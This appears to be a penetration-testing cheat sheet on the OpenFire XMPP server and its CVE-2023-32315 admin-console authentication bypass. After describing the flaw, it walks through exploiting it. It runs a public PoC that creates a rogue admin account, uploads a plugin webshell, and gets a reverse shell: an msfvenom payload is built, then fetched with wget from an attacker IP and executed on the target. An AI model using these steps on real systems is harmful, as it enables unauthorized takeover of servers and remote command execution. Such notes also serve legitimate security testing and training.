OpenFire

OpenFire is an open-source, real-time collaboration server built on the XMPP (Extensible Messaging and Presence Protocol) standard. It is primarily used for internal chat services, presence management, and messaging between users within organizations. Designed in Java, OpenFire provides a web-based admin interface and supports features such as user authentication, group chat, message archiving, and integration with LDAP or Active Directory. OpenFire may appear as an exposed service running on default ports (usually 5222 for XMPP and 9090 or 9091 for web management). Improperly secured deployments can lead to information disclosure, unauthorized access to admin panels, or even remote code execution in vulnerable versions.

Authentication Bypass to RCE

OpenFire versions prior to 4.6.8, as well as 4.7.0 through 4.7.4, are affected by a critical authentication bypass vulnerability in the OpenFire Admin Console (CVE-2023-32315). The flaw arises from improper access control on specific setup endpoints, which remain accessible even after the initial configuration process is completed.

Under normal conditions, the OpenFire web interface enforces restrictions that prevent unauthenticated users from accessing sensitive administrative functionality. However, in affected versions, the server fails to properly restrict access to legacy setup paths located under /setup/. An attacker can exploit this by directly accessing these endpoints to reinitialize parts of the server configuration. This allows the creation of a new administrative account without requiring existing credentials. Successful exploitation results in full administrative control over the OpenFire instance, including the ability to read user messages, manage accounts, and potentially execute code depending on how plugins or integrations are configured.

A working PoC is available which leverages privileged functionality, i.e. uploading and deploying custom plugins in the form of .jar files, after creating an admin account to achieve RCE. This is standard behavior in OpenFire's admin console and does not require another vulnerability.

$ python3 CVE-2023-32315.py -t http://openfire-instance:9090
<SNIP>
User added successfully: url: http://openfire-instance:9090 username: qwkc2s password: 2vzxql

If the login and/or the server request hangs:

• After creating the user go directly to http://openfire-instance:9090/plugin-admin.jsp

• After uploading the plugin go directly to http://openfire-instance:9090/plugins/openfire-management-tool-plugin/cmd.jsp

A reverse shell can be obtain by executing the following commands via the webshell:

# Create a revshell binary on the attacking host
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=80 -f elf -o revshell.elf

# Download the binary on the target
wget http://192.168.45.170:443/revshell.elf -O /tmp/revshell.elf
# Assign execute permissions on the file
chmod +x /tmp/revshell.elf
# Execute the malicious binary
/tmp/revshell.elf